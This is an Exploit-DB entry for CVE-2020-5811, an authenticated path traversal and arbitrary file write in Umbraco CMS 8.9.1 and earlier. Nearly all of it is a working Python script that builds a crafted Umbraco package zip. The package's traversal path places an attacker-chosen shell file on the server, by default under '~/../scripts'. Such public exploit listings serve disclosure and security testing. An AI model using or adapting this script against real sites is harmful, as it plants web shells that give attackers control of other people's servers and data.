Umbraco CMS 8.9.1 - Directory Traversal

EDB-ID:

50241




Platform:

ASPX

Date:

2021-08-31


# Exploit Title: Umbraco CMS 8.9.1 - Path traversal and Arbitrary File Write (Authenticated)
# Exploit Author: BitTheByte
# Description: Authenticated path traversal vulnerability.
# Exploit Research: https://www.tenable.com/security/research/tra-2020-59
# Vendor Homepage: https://umbraco.com/
# Version: <= 8.9.1 
# CVE : CVE-2020-5811

import string
import random
import argparse
import zipfile
import os

package_xml = f"""<?xml version="1.0" encoding="utf-8"?>
<umbPackage>
  <files>
    <file>
      <guid>{{filename}}</guid>
      <orgPath>{{upload_path}}</orgPath>
      <orgName>{{filename}}</orgName>
    </file>
  </files>
  <info>
    <package>
      <name>PoC-{''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))}</name>
      <version>1.0.0</version>
      <iconUrl></iconUrl>
      <license url="http://opensource.org/licenses/MIT">MIT License</license>
      <url>https://example.com</url>
      <requirements>
        <major>0</major>
        <minor>0</minor>
        <patch>0</patch>
      </requirements>
    </package>
    <author>
      <name>CVE-2020-5811</name>
      <website>https://example.com</website>
    </author>
    <contributors>
      <contributor></contributor>
    </contributors>
    <readme><![CDATA[]]></readme>
  </info>
  <DocumentTypes />
  <Templates />
  <Stylesheets />
  <Macros />
  <DictionaryItems />
  <Languages />
  <DataTypes />
  <Actions />
</umbPackage>
"""

parser = argparse.ArgumentParser(description='CVE-2020-5811')
parser.add_argument('--shell', type=str, help='Shell file to upload', required=True)
parser.add_argument('--upload-path', type=str, help='Shell file update path on target server (default=~/../scripts)', default='~/../scripts')
args = parser.parse_args()

if not os.path.isfile(args.shell):
  print("[ERROR] please use a correct path for the shell file.")

output_file = "exploit.zip"

package = zipfile.ZipFile(output_file, 'w')  
package.writestr('package.xml', package_xml.format(filename=os.path.basename(args.shell), upload_path=args.upload_path))
package.writestr(os.path.basename(args.shell), open(args.shell, 'r').read())
package.close()

print(f"[DONE] Created Umbraco package: {output_file}")